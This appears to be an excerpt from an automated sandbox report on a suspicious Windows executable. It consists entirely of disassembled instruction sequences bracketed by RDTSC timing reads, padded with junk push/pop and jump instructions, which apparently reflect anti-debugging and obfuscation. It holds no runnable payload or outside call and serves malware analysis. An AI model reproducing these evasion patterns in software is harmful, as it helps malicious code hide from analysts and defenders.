Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01785 second address: 4A017BD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F6E644F7535h 0x00000010 mov ebp, esp 0x00000012 jmp 00007F6E644F752Eh 0x00000017 pop ebp 0x00000018 pushad 0x00000019 mov cl, F8h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A091D second address: 49A0921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0921 second address: 49A0925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0925 second address: 49A092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0711 second address: 49D064F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov ax, C1A3h 0x0000000f pushfd 0x00000010 jmp 00007F6E644F7538h 0x00000015 jmp 00007F6E644F7535h 0x0000001a popfd 0x0000001b popad 0x0000001c retn 0008h 0x0000001f push 00401BF4h 0x00000024 push edi 0x00000025 mov dword ptr [0045F81Ch], eax 0x0000002a call esi 0x0000002c mov edi, edi 0x0000002e jmp 00007F6E644F7530h 0x00000033 xchg eax, ebp 0x00000034 pushad 0x00000035 mov al, 77h 0x00000037 push eax 0x00000038 push edx 0x00000039 mov edi, 04A7D05Ch 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B06E8 second address: 49B06F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49B06F7 second address: 49B06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0158C second address: 4A015D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6E64DC24C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6E64DC24C8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A015D8 second address: 4A015DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A015DC second address: 4A015E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A015E2 second address: 49A091D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov esi, 3178BCF7h 0x00000011 pushfd 0x00000012 jmp 00007F6E644F752Ch 0x00000017 jmp 00007F6E644F7535h 0x0000001c popfd 0x0000001d popad 0x0000001e pop ebp 0x0000001f jmp 00007F6E644F752Eh 0x00000024 jmp dword ptr [7721155Ch] 0x0000002a mov edi, edi 0x0000002c push ebp 0x0000002d mov ebp, esp 0x0000002f mov ecx, dword ptr fs:[00000018h] 0x00000036 mov eax, dword ptr [ebp+08h] 0x00000039 mov dword ptr [ecx+34h], 00000000h 0x00000040 cmp eax, 40h 0x00000043 jnc 00007F6E644F752Dh 0x00000045 mov eax, dword ptr [ecx+eax*4+00000E10h] 0x0000004c pop ebp 0x0000004d retn 0004h 0x00000050 test eax, eax 0x00000052 je 00007F6E644F7543h 0x00000054 mov eax, dword ptr [00459710h] 0x00000059 cmp eax, FFFFFFFFh 0x0000005c je 00007F6E644F7539h 0x0000005e mov esi, 00401BB4h 0x00000063 push esi 0x00000064 call 00007F6E68A8ECAAh 0x00000069 mov edi, edi 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990730 second address: 499073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 499073F second address: 4990758 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0640199Ah 0x00000008 mov edi, 52F63566h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov di, 7EECh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990758 second address: 49907CB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6E64DC24C5h 0x00000008 and ah, FFFFFFC6h 0x0000000b jmp 00007F6E64DC24C1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 52B07777h 0x00000018 popad 0x00000019 mov ecx, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d mov eax, 08A8DE6Fh 0x00000022 call 00007F6E64DC24C4h 0x00000027 mov edi, esi 0x00000029 pop eax 0x0000002a popad 0x0000002b mov eax, 00000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F6E64DC24C4h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49907CB second address: 49907D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49907D1 second address: 4990801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6E64DC24BCh 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e inc eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6E64DC24C8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990801 second address: 4990807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990807 second address: 499080B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0004A second address: 4A0004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0004E second address: 4A00052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00052 second address: 4A00058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00058 second address: 4A0006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0006B second address: 4A0006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0006F second address: 4A00097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F6E64DC24C5h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00097 second address: 4A0009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0009B second address: 4A000A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000A1 second address: 4A000B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7531h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000B6 second address: 4A00137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 sub esp, 18h 0x0000001c pushad 0x0000001d jmp 00007F6E64DC24C1h 0x00000022 movzx ecx, di 0x00000025 popad 0x00000026 push ecx 0x00000027 pushad 0x00000028 movzx ecx, dx 0x0000002b jmp 00007F6E64DC24BBh 0x00000030 popad 0x00000031 mov dword ptr [esp], ebx 0x00000034 jmp 00007F6E64DC24C6h 0x00000039 mov ebx, dword ptr [eax+10h] 0x0000003c jmp 00007F6E64DC24C0h 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00137 second address: 4A00159 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F6E644F7532h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00159 second address: 4A001B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [772406ECh] 0x0000000f pushad 0x00000010 jmp 00007F6E64DC24BCh 0x00000015 pushfd 0x00000016 jmp 00007F6E64DC24C2h 0x0000001b sbb ecx, 4C7F5E48h 0x00000021 jmp 00007F6E64DC24BBh 0x00000026 popfd 0x00000027 popad 0x00000028 test esi, esi 0x0000002a pushad 0x0000002b mov edi, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f movzx ecx, di 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A001B5 second address: 4A001E9 instructions: 0x00000000 rdtsc 0x00000002 call 00007F6E644F7533h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007F6E644F82BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6E644F7531h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A001E9 second address: 4A001FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A001FE second address: 4A00204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00204 second address: 4A00208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00208 second address: 4A0020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0020C second address: 4A00222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E64DC24BBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00222 second address: 4A00281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6E644F7533h 0x00000014 pushfd 0x00000015 jmp 00007F6E644F7538h 0x0000001a xor ah, 00000058h 0x0000001d jmp 00007F6E644F752Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00281 second address: 4A002CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2113107Ah 0x00000008 call 00007F6E64DC24BBh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 call dword ptr [77210B60h] 0x00000017 mov eax, 766BE5E0h 0x0000001c ret 0x0000001d pushad 0x0000001e jmp 00007F6E64DC24C0h 0x00000023 popad 0x00000024 push 00000044h 0x00000026 pushad 0x00000027 mov dx, ax 0x0000002a movzx eax, bx 0x0000002d popad 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F6E64DC24C0h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A002CD second address: 4A00395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F752Ch 0x00000009 or esi, 0BBAFC78h 0x0000000f jmp 00007F6E644F752Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, edi 0x00000019 jmp 00007F6E644F7536h 0x0000001e push eax 0x0000001f jmp 00007F6E644F752Bh 0x00000024 xchg eax, edi 0x00000025 jmp 00007F6E644F7536h 0x0000002a push dword ptr [eax] 0x0000002c pushad 0x0000002d mov al, 01h 0x0000002f pushfd 0x00000030 jmp 00007F6E644F7533h 0x00000035 sbb si, 26FEh 0x0000003a jmp 00007F6E644F7539h 0x0000003f popfd 0x00000040 popad 0x00000041 mov eax, dword ptr fs:[00000030h] 0x00000047 jmp 00007F6E644F752Eh 0x0000004c push dword ptr [eax+18h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F6E644F7537h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0042C second address: 4A0043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0043B second address: 4A004A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007F6E644F752Fh 0x00000014 sub ecx, 4E8111FEh 0x0000001a jmp 00007F6E644F7539h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 mov dword ptr [esi+0Ch], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F6E644F7533h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004A8 second address: 4A004AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004AC second address: 4A00571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a jmp 00007F6E644F752Bh 0x0000000f mov dword ptr [esi+10h], eax 0x00000012 jmp 00007F6E644F7536h 0x00000017 mov eax, dword ptr [ebx+50h] 0x0000001a jmp 00007F6E644F7530h 0x0000001f mov dword ptr [esi+14h], eax 0x00000022 jmp 00007F6E644F7530h 0x00000027 mov eax, dword ptr [ebx+54h] 0x0000002a jmp 00007F6E644F7530h 0x0000002f mov dword ptr [esi+18h], eax 0x00000032 pushad 0x00000033 push eax 0x00000034 pushfd 0x00000035 jmp 00007F6E644F752Dh 0x0000003a or si, 3306h 0x0000003f jmp 00007F6E644F7531h 0x00000044 popfd 0x00000045 pop eax 0x00000046 mov eax, ebx 0x00000048 popad 0x00000049 mov eax, dword ptr [ebx+58h] 0x0000004c jmp 00007F6E644F7533h 0x00000051 mov dword ptr [esi+1Ch], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F6E644F7535h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00571 second address: 4A005D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c jmp 00007F6E64DC24BEh 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 jmp 00007F6E64DC24C0h 0x00000019 mov eax, dword ptr [ebx+60h] 0x0000001c jmp 00007F6E64DC24C0h 0x00000021 mov dword ptr [esi+24h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6E64DC24C7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A005D9 second address: 4A005DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A005DF second address: 4A005E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A005E3 second address: 4A00623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c call 00007F6E644F752Dh 0x00000011 mov eax, 4CB7C417h 0x00000016 pop ecx 0x00000017 push ebx 0x00000018 mov ch, 1Fh 0x0000001a pop edi 0x0000001b popad 0x0000001c mov dword ptr [esi+28h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6E644F7537h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00623 second address: 4A0062C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E4DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007E9 second address: 4A007EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007EF second address: 4A00844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 mov ecx, edx 0x00000014 popad 0x00000015 push 00000001h 0x00000017 pushad 0x00000018 movsx edx, ax 0x0000001b mov esi, 1CDEF3BDh 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007F6E64DC24C8h 0x00000027 push eax 0x00000028 pushad 0x00000029 popad 0x0000002a nop 0x0000002b pushad 0x0000002c pushad 0x0000002d mov dl, D1h 0x0000002f mov ax, 5F0Dh 0x00000033 popad 0x00000034 mov ax, DF09h 0x00000038 popad 0x00000039 lea eax, dword ptr [ebp-10h] 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00844 second address: 4A00848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00848 second address: 4A00859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00859 second address: 4A0088F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F6E644F752Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6E644F752Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0088F second address: 4A00895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00895 second address: 4A0089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008E6 second address: 4A008EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008EA second address: 4A008EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008EE second address: 4A008F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008F4 second address: 4A00955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F7532h 0x00000009 adc eax, 1C368508h 0x0000000f jmp 00007F6E644F752Bh 0x00000014 popfd 0x00000015 mov di, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test edi, edi 0x0000001d jmp 00007F6E644F7532h 0x00000022 js 00007F6ED6CB62B3h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6E644F7537h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00955 second address: 4A0099D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebp-0Ch] 0x0000000f pushad 0x00000010 movzx esi, dx 0x00000013 jmp 00007F6E64DC24C5h 0x00000018 popad 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6E64DC24C8h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0099D second address: 4A009A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A009A3 second address: 4A009BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 63A3h 0x00000007 mov ecx, 51A096FFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lea eax, dword ptr [ebx+78h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A009BB second address: 4A009BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A009BF second address: 4A009D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A009D6 second address: 4A00A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007F6E644F7530h 0x0000000c sub ecx, 2270A348h 0x00000012 jmp 00007F6E644F752Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push 00000001h 0x0000001d jmp 00007F6E644F7536h 0x00000022 nop 0x00000023 pushad 0x00000024 mov dl, ch 0x00000026 mov dh, 8Eh 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00A28 second address: 4A00A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00A36 second address: 4A00B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F7531h 0x00000009 or ax, E876h 0x0000000e jmp 00007F6E644F7531h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e pushfd 0x0000001f jmp 00007F6E644F7535h 0x00000024 sbb esi, 27776486h 0x0000002a jmp 00007F6E644F7531h 0x0000002f popfd 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp-08h] 0x00000034 jmp 00007F6E644F752Eh 0x00000039 nop 0x0000003a pushad 0x0000003b jmp 00007F6E644F752Eh 0x00000040 pushfd 0x00000041 jmp 00007F6E644F7532h 0x00000046 sub si, 8188h 0x0000004b jmp 00007F6E644F752Bh 0x00000050 popfd 0x00000051 popad 0x00000052 push eax 0x00000053 jmp 00007F6E644F7539h 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F6E644F752Dh 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00B0B second address: 4A00B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00B61 second address: 4A00BBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F6ED6CB6061h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F6E644F7533h 0x00000018 sbb al, FFFFFFFEh 0x0000001b jmp 00007F6E644F7539h 0x00000020 popfd 0x00000021 mov esi, 26B48047h 0x00000026 popad 0x00000027 rdtsc
